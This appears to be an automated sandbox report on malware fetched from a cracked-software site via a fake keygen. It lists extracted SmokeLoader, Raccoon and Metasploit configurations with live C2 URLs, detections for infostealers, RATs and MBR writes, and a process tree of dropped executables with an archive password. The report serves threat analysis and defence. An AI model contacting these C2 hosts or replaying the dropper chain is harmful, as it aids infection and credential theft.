Analysis
-
max time kernel
208s -
max time network
230s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 10:50
Errors
Reason
Machine shutdown
General
-
Target
https://cracknet.net/
-
Sample
210213-pdsnp7g4a2
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
17694a35d42ac97e2cd3ebd196db01b372cce1b0
Attributes
-
url4cnc
https://telete.in/o23felk0s
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
027bc1bb9168079d5f7473eee9c05ee06589c305
Attributes
-
url4cnc
https://telete.in/jjbadb0y
rc4.plain
rc4.plain
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Modifies boot configuration data using bcdedit 3 IoCs
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 45 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 30 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Drops Chrome extension 1 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 53 IoCs
-
Drops file in Windows directory 12 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Control Panel 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 10 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Runs ping.exe 1 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cracknet.net/1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffefc546e00,0x7ffefc546e10,0x7ffefc546e202⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6cdef7740,0x7ff6cdef7750,0x7ff6cdef77603⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4908 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6220 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6408 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6256 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6972 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7120 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7256 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7532 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7656 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7916 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7388 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8164 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8296 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8288 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8520 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8676 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8516 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9000 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9224 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9368 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9356 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8816 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3428 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5716 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,11160474923658729416,11950546428263801529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1732 /prefetch:82⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Xforce_keygen_by_KeygenNinja.zip\Xforce_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Xforce_keygen_by_KeygenNinja.zip\Xforce_keygen_by_KeygenNinja.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
